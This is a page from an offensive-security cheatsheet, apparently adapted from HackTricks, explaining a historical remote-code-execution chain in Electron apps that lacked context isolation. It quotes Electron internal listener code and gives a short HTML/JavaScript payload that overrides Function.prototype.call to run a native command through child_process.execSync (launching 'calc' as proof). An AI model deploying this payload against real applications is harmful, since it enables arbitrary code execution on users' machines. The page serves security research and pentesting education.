daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

electron-contextisolation-rce-via-electron-internal-code.md (4604B)


      1 ---
      2 title: "Electron context-isolation RCE via internal code"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Electron context-isolation RCE via internal code
     14 
     15 These are **historical exploitation patterns** for Electron applications that ran untrusted renderer content without context isolation. Context isolation has been enabled by default since Electron 12 and remains a recommended security setting.<sup>[[1]](#references)</sup> Exact internals differ by Electron and Node.js version, so reproduce a chain against the target application's bundled versions.
     16 
     17 ## Example 1: overriding `Function.prototype.call`
     18 
     19 This example comes from Masato Kinugawa's CureCon presentation.<sup>[[2]](#references)</sup>
     20 
     21 In the affected historical Electron build, internal ASAR code registered a process `exit` listener. Because page code and Electron's internal code shared JavaScript prototypes when context isolation was disabled, renderer code could replace `Function.prototype.call` before the internal listener ran.<sup>[[2]](#references)</sup><sup>[[3]](#references)</sup>
     22 
     23 ```javascript
     24 process.on("exit", function () {
     25   for (let p in cachedArchives) {
     26     if (!hasProp.call(cachedArchives, p)) continue
     27     cachedArchives[p].destroy()
     28   }
     29 })
     30 ```
     31 
     32 ![Electron asar.js internal code path used in the contextIsolation RCE example](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%281070%29.png)
     33 
     34 The listener was dispatched through Node.js's event machinery. The original page linked a stale `bin/events.js` path; the same historical commit's live source is under `lib/events.js`.<sup>[[5]](#references)</sup>
     35 
     36 ![Node events.js code path reached by the Electron contextIsolation RCE chain](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28793%29.png)
     37 
     38 In this path, `self` is Node.js's process object:
     39 
     40 ![Electron contextIsolation RCE via Electron internal code - Example 1: Where "self" is Node's process object](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28700%29.png)
     41 
     42 The historical process object exposed a path to `require`:
     43 
     44 ```text
     45 process.mainModule.require
     46 ```
     47 
     48 Because the listener dispatcher invoked the handler with the process object, overriding `call` could recover that object and execute a native command:
     49 
     50 ```html
     51 <script>
     52   Function.prototype.call = function (process) {
     53     process.mainModule.require("child_process").execSync("calc")
     54   }
     55   location.reload() // Trigger the listener during navigation
     56 </script>
     57 ```
     58 
     59 ## Example 2: prototype pollution
     60 
     61 The ElectroVolt presentation demonstrates another historical chain that obtains a `require` object through prototype pollution.<sup>[[4]](#references)</sup>
     62 
     63 Leak:
     64 
     65 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28279%29.png" alt=""><figcaption></figcaption></figure>
     66 
     67 Exploit:
     68 
     69 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%2889%29.png" alt=""><figcaption></figcaption></figure>
     70 
     71 ## References
     72 
     73 - [1] [Electron documentation - Context isolation](https://www.electronjs.org/docs/latest/tutorial/context-isolation)
     74 - [2] [Electron: Abusing the lack of context isolation - CureCon](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)
     75 - [3] [Electron historical source - lib/common/asar.js](https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36)
     76 - [4] [ElectroVolt: Pwning Popular Desktop Apps While Uncovering New Attack Surface on Electron](https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81)
     77 - [5] [Node.js historical source - `lib/events.js` listener dispatch](https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/lib/events.js#L156-L231)